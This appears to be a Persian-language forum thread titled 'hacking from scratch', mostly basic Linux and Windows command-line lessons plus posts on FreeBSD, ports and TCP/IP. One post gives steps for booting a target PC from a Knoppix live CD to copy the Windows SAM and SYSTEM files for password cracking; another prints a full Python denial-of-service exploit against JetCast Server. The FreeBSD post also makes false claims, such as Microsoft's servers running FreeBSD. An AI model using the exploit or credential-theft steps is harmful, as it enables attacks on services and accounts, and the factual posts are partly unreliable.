آموزش هك از پايه

[TS-KaSrA]

پس PID اون ميشه 3125 حالا مينويسم Kill 3125 و تمام نكته:براي kill كردن برخي پروسسها لازمه با دستور su روت شد ابن دستور مشابه دستور taskkill تو ويندوزه ابتدا ?/ taskkill فراموش نشه چون پارامترهاي زياده داره اين دستور ---------------------- ------------------------------ مثال:ميخام برنامه Notepad در حال اجراي خودم رو ببندم مينويسم taskkill /f /im notepad.exe يا ميتونم PID اون رو با tasklist بدست بيارم و بنويسم taskkill /pid 2744 ------------------------------------- -------------------------------------- PID در مطالب بالا مخفف Process ID اميدوارم اين قسمت مهم كه هم در لوكال و هم در ريموت كارايي زيادي داره مورد توجه قرار گرفته باشه من اين دستورات مشابه رو هم ميگم كه يه مقايسه اي بين خط فرمان دو سيستم عامل باشه

[TS-KaSrA]

خط فرمان لينوكس قسمت 4 به نام خدا در مورد فايل سيستم و ديسك سخت با استفاده از فرمان df گزارشي از فايل سيستم و فضاي ديسك سخت ميگيرم پس مينويسم df -a ------------------------------ ------------------------------------- همچنين با استفاده از فرمان du كه شكل اون هستdu -a filename ميتونيم فضاي مورد استفاده فايل خودمون رو تخمين (Estimate)بزنيم ------------------------------------------ ------------------------------------------ براي ديدن اطلاعات در مورد كاربر جاري و ليست كردن يوزرها و........ از فرمان finger همراه با سوييچها مربوطه كمك ميگيريم يادآوري در هر فرماني كه مشكل داشتيد man يادتون نره براي مثال man finger ------------------------------------------------------ ---------------------------------------------------------------- اما يه نكته در مورد بدست آوردن Sam و Systemكه در موردش تو همينجا توضيح دادم يكي از راههاي بدست آوردن اون استفاده از Dos بود كه در موردش سرچ كنيد يا........... اما ميشه Sam رو هم با لايو سيدي هاي لينوكسي از جمله Knoppix بدست آورد كه از درايوهاي ويندوزي پشتيباني ميكنه پس ابتدا بايد سيستم مورد نظر رو از روي cd بوت كنيم منظورم با ناپيكس سپس درايوي رو كه ويندوز توشه پيدا كنيم و به مسير Windows/System32/Config ------------- --------------- رفته و دو فايل Sam و System رو كپي كنيم تو فلاپي البته اگه يه فلاپي داشتيم ميتونيم اونارو زيپ كنيم و سپس تو فلاپي بريزيم و ببريم براي Crack ---------------------------

[TS-KaSrA]

اينم كد يه اكسپلويت با پايتون #!/usr/bin/python """ ____ __ __/ ___|___ _ __ ___ \ \ / / | / _ \| '__/ _ \ \ V /| |__| (_) | | | __/ \_/ \____\___/|_| \___| _ _ __ _ __ ___ ___ ___ _ __ | |_ ___ _ | '_ \| '__/ _ \/ __|/ _ \ '_ \| __/ __| |_| | |_) | | | __/\__ \ __/ | | | |_\__ \ _ | .__/|_| \___||___/\___|_| |_|\__|___/ |_| |_| _ _ // \\// GENRE: //\\PLOIT // ` PROGRAM: JetCast Server 2.0.0.4308 EXPLOiT TYPE: 0day remote DoS exploit EXPLOiT LANGUAGE: Python DEBUG iNFO: [Module JSMP3OGG] EAX 100355B8 JSMP3OGG.100355B8 ECX 00000007 EDX 00002000 EBX 00CB415A ESP 00DCDEC0 EBP 00DCDECC ESI 00000000 EDI 1002FA64 ASCII "Mozilla" EIP 1002737C JSMP3OGG.1002737C MOV AH,BYTE PTR DS:[ESI]; C0000005 (ACCESS VIOLATION) Bug found / exploit written by vCore Tested on JetCast Server 2.0.0.4308 - Windows XP ServicePack2 ____ _ / ___|_ __| | ___ _ | | / _ \ / _` |/ _ \ |_| | |__| (_) | (_| | __/ _ \____\___/ \__,_|\___| |_| """ from time import sleep from socket import * target = '127.0.0.1' port = 8000 buf = "A" * 4032 header = ( 'GET /%s.mp3 HTTP/1.0\r\n' 'Host: %s\r\n' 'User-Agent: WinampMPEG/5.19\r\n' 'Accept: */*\r\n' 'Icy-MetaData:1\r\n' 'Connection: close\r\n') % (buf, target) s = socket(AF_INET, SOCK_STREAM) s.connect((target, port)) s.send(header) sleep(2) s.close() print "DONE"

[TS-KaSrA]

سيستم عامل FreeBSD سيستم عامل FreeBSD ّFreeBSD يك سيستم عامله قدرتمند وكارا است مخصوصا درNetwork اين سيستم عامل از خانواده UNIX است كه در بين اونها واقعا از مهمترين هاست و بيشترين استفاده رو هم داره BSD مخفف Berkeley Software Distribution BSD از سال 1992 از متن هاي AT&T مستقل شد BSD به تنهايي يك سيستم عامل نمي باشد FreeBSD متن باز و با شعار GUI و كارايي بالا شروع به گسترش نمود FreeBSD حدود 14 سال پيش بوسيله ديويد گرينمن برنامه ريزي شد نسخه هاي BSD 1.FreeBSD 2.NetBSD 3.OpenBSD 4.MACOS X 5.DragonFLY BSD 6.MirOS BSD 7.Debian NetBSD -------------------------------------------------------------------------- نكته مهم اين هست كه سيستم عامل سرور بسيار زيادي از شركتهاي مهم همين FreeBSD هست از جمله Yahoo بقيه رو هم ميتونيد با سرچ ببينيد كه چقدر زيادن حتي سيستم عامل سرور مايكروسافت FreeBSD هست نه Windowsهمچنين Mp3.comو Hotmail و نكته مهم سازگاري اين سيستم عامل با اكثر سخت افزارها و پلتفرم ها است NetBSD هم با FreeBSD شروع به گسترش كرد كه يه سيستم عامل پرتابل(Portable) است OpenBSD از روي NetBSD ساخته و پرداخته شد با شعار High Level Securty MacOS X يه سيستم عامل تجاري هست كه بزرگترين بخش دنياي يونيكس در مكينتاش براي كاربران مكينتاش است با MAC OS اشتباه نشود و........ آخرين ورژن اون تا اين لحظه 2.6 است

[TS-KaSrA]

خط فرمان لينوكس قسمت پنجم و شل شل(Shell)چيست؟برنامه اي است در لينوكس كه واسط خط فرمان ميشه بين كاربر و هسته سيستم عامل اينو قبلا گفتم!!! Shell به معني پوسته براي اينكه تعيين كنيم داريم از كدوم شل استفاده ميكنيم از فرمان echo بصورت echo $SHELL استفاده ميكنيم ميبينيم كه ---------- ------------- مسير شل جاري كه همون bin/bash/ باشه رو نمايش ميده و شل bash شل پيشفرض در لينوكس هستش اما براي اينكه بفهميم كدوم شل ها در ليوكس ما يافت ميشن ميتونيم: 1-ابتدا به etc/ ميريم وسپس فايلي به نام shells رو با فرمان more shells اجرا ميكنيم پس ميبينيم ليست از شل هارو (مسير shells) -------------- --------------------- ------------ ------------------ 2-از دستور chsh كه مخفف (change shell) هست بصورت chsh -l استفاده ميكنيم كه سوييچ l- هم يعني همون List ------------------ ------------------------ چطور از شل ها استفاده كنم براي لوگين كردن به شلي كه وجود داره ميتونيم مسير كامل اونرو بنويسم مثلا مينويسم bin/ksh/ ------------------ ----------------------- براي تغيير هميشگي خط فرمان به شل مورد نظر مينويسم chsh سپس از من رمز ميخاد حالا مسير شل مورد نظرمو كه تو بالا بدست آوردم مينويسم و تمام --------------- ---------------------- اما توضيحي درباره شل هاي مختلف ------------------- -------------------------- اين از شل ها اما توضيحي درباره فرمان date كه ميشه استفاده مهمي از اون كرد همگي كه وارديد پس man date فراموش نشه ----------------- ----------------------- فرمان echo فرماني بسيار مهم كه با پارامترهاي مختلف بكار ميره و كارهاي بسياري ميشه با اون انجام داد از جمله كارهاي حسابي و ............. پس مينويسم [echo $[20-9 و جواب ميشنوم 11 ---------------

[TS-KaSrA]

خط فرمان لينوكس قسمت ششم اگه يادتون باشه تو ويندوز از فرمان type براي ديدن محتويات فايلها استفاده ميكرديم تو لينوكس از فرمان Cat بصورت cat filename استفاده ميكنيم(يه فرمان ديگم گفتم) براي مثال ميخوام محتويات فايل Shells رو ببينم تا بفهمم كه چه شل هايي يافت ميشن پس مينويسم cat /etc/shells -------------------------------------- ------------------------------------------------- يه نكته تكميلي هم در مورد دستور chsh بگم اگر بصورت chsh username استفاده بشه ميتونيم شل رو براي كاربر خاصي تغيير بديم ------------------------------ ----------------------------------- من تو بالا به روت لوگين كردم و شل كاربر Br4v3 رو تغيير دادم فرمان Set در ابتدا بهتره از متغير محيطي و محلي داشته باشيم متغير محيطي براي نمايش Information هايي در مورد شل و برنامه هاي كاربر جاري در خط فرمان كاربرد داره و براي هر كاربر بصورت Private (خصوصي) هست براي ديدن يك متغير محيطي از فرمان echo $name استفاده ميشه كه با جاي name نام متغير خودمون رو مينويسيم براي مثال من ميخام متغير محلي PATH رو ببينم مينويسم echo $PATH ----------------------------- ------------------------------------ اما با استفاده از فرمان Set ميتونيم تمامي متغيرها رو ليست كنيم كه اگر توجه كنيد داراي Info هاي مهمي هست ------------------------------------- ------------------------------------------ دستورات تكميلي در مورد فايلها براي ديدن نوع فايلها از فرمان File به اين صورت استفاده ميكنيمFile filename كه در ويندوز پسوند فايل بيانگر نوع اون است --------------------------------------------------- -------------------------------------------------------- فرمان head,tail با استفاده از فرمان head ميتونيم براي نمايش تعداد خطوط يك فايل بصورت دلخواه استفاده كنيم كه اين فرمان ابتداي فايل رو چاپ ميكنه و فرمان tail از انتهاي فايل شروع به نمايش دادن ميكنه يك مثال ابتدا نوع فايل خودمو تعيين ميكنم پس از نوع ASCII text هست حالا ميخام كه فقط 8 خط اولش چاپ بشه پس مينويسم head -8 Sma.fc6 ميبينيد كه همينطوره و براي درك بيشتر من همين فايل رو با gedit باز كردم ------------------------------------ -------------------------------------------- حالا ميخام 8 خط از آخر همين فايل نمايش داد بشه پس مينويسم tail -8 Sma.fc6 --------------------------------------- ------------------------------------------------- فايل passwd اين فايل در مسير etc/ موجود هست و از اون ميتونيم براي ست كردن رمز عبور استفاده بكنيم پس كافيه در خط فرمان بنويسيم passwd و رمز عبور جديد رو بنويسم ------------------------------- ---------------------------------------------- و همچنين براي ويرايش اين فايل مهم از pico/ etc/passwd استفاده مكنيم اگر بنويسم cat /etc/passwd اطلاعاتي مهم نمايش داده ميشن --------------------------------------------------------- ------------------------------------------------------------------- اين هم از اين قسمت

[TS-KaSrA]

فرد سعی می کنه تا با استفاده از پورت 8000 به یک سرور HTTP وصل بشه. البته توجه داشته باشید که تمام لایه های انتقال داده از پورت استفاده نمی کنند، اگرچه TCP و UDP از پورت استفاده می کنند اما ICMP نه! در TCP و UDP هر بسته از یک پورت مبدا و یک پورت مقصد که یک عدد 16 بیتی در رینج صفر تا 65535 است به همان صورتی که آدرس ( IP ) فرستنده و گیرنده را مشخص می کنند، استفاده می کند. IANA مسئول ثبت پورت ها برای استفاده های خاص است. هرچند همیشه نرم افزاری را مجبور به استفاده از پورت خاصی نمی کنه، گاهی پورت ها مورد استفاده نرم افزار یا پروتوکلی می شوند که درواقع برای آن ثبت نشده اند. پورت ها درسه دسته ی مختلف دسته بندی می شوند: Well Known Ports که در رینج 0–1023 قرار دارند. Registered Ports که در رینج 1024–49151 قرار دارند. Dynamic and/or Private Ports که در رینج 49152–65535 هستند. نرم افزار ها بطور پیش فرض از این پورت ها استفاده نمی کنند.

[TS-KaSrA]

یا همان tcp سک پروتوکل کرکزی در سری پروتوکل های اینترنت می باشد. Tcp یک پورت قابل اطمینان است از این جهت که تضمین می کند تا داده های شما بدون هیچ گونه خطایی منتقل شوند و از این جهت است که می توان از آن برای نرم افزارهایی همچون انتقال فایل و ایمیل استفاده کرد! Tcp از چهار لایه تشکیل شده: لایه اول: لایه واسطه شبکه در این لایه استاندارد های سخت افزاری، نرم افزاری و پروتکل های شبکه تعریف شده است. این لایه درگیر بامسائل سخت افزاری و نرم افزاری مرتبط باشبکه بوده و می تواند عناصر همگن و ناهمگن رابه هم پیوند بزند. دراین لایه تمام پروتکل های lan, man قابل استفاده هستند. ================= لایه دوم: لایه شبکه وظیفه اصلی این لایه هدایت ازمبدا تامقصد بسته های اطلاعاتی خاص به نام ip است. به غیر از پروتکل ip پروتکل هایی دیگری نیز هستند که وظایف مهمی رابر عهده دارند. مهمترین آنها: Arp, bootp, icmp, rip, rarp ... دراین لایه مسیر یاب از شرایط توپولوژیکی و ترافیکی شبکه، اطلاعات را کسب می کند تا مسیر یاب ها به روش آسان و پویا انجام دهد. ================= لایه سوم: لایه انتقال دراین لایه ماشین های میزبان درشبکه باهم ارتباط برقرار می کنند به عبارت دیگر یک سرویس اتصال گرا مطمئن است برای عملیاتی مانند ارسال صوت و تصویر که سرعت مهمتر ازدقت است سرویس های سریع و نامطمئن طراحی شده است. دراین سرویس لایه از رسیدن داده به مقصد اطلاع می یابد. ================= لایه چهارم: لایه کاربرد این لایه دارای صطح بالایی برای خلق برنامه های کاربردی ویژه و پیچیده ارائه می شود. انتقال فایل یا ftp و شبیه سازی ترمینال و مدیریت پست و انتقال صفحات ابر متنی و ده ها پروتکل کاربردی دیگر از سطح این لایه است.